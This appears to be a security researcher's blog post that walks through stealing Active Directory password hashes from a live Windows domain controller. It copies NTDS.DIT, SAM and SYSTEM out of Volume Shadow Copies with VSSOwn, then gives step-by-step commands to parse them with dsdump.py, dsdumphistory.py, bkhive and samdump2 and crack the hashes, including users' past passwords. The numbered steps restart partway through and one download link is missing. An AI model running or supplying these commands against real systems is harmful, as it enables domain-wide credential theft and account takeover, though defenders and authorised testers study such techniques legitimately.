The basis of the talk and the purpose for Mark's research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.
The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.
So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.
But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:
1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create
2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
3. Copy files to BT5R1.
2. Download tools from:
3. Configure and Make the source code for libesedb from the extracted package.
chmod +x configure
./configure && make
4. Use esedbdumphash to extract the datatable from ntds.dit.
5a. Use dsdump.py to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt
6. Crack the hashes.
Beautiful right? But we're not done yet. Csaba also created a tool called dsdumphistory.py which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.
python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable
So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!